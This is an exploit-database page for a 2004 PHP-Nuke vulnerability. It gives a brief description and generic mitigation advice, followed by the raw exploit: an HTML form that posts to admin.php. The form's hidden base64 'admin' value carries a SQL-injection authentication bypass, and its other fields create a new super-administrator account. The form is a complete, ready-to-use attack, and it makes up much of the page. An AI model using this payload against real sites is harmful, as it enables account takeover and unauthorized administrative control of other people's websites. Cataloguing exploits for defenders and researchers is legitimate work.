header-logo
Suggest Exploit
vendor:
by:
milw0rm.com
N/A
CVSS
N/A
HTTP form exploit
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

HTTP form exploit demonstration

This is a demonstration exploit that showcases how an attacker can use an HTTP form to perform unauthorized actions on a website. The form targets the admin.php page of a website and allows the attacker to create a new admin user with elevated privileges. The form collects inputs for username, name, password, and email. It also includes hidden fields that set additional parameters, such as admin rights and the operation to add an author. Once the form is submitted, the attacker can create a new admin user by clicking the 'Create Admin' button.

Mitigation:

To mitigate this vulnerability, website administrators should implement proper input validation and access controls. They should also ensure that sensitive operations, such as creating admin users, require additional authentication and authorization.
Source

Exploit-DB raw data:

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

# milw0rm.com [2004-09-08]

Navigation

Suggest Exploit

Services By CQR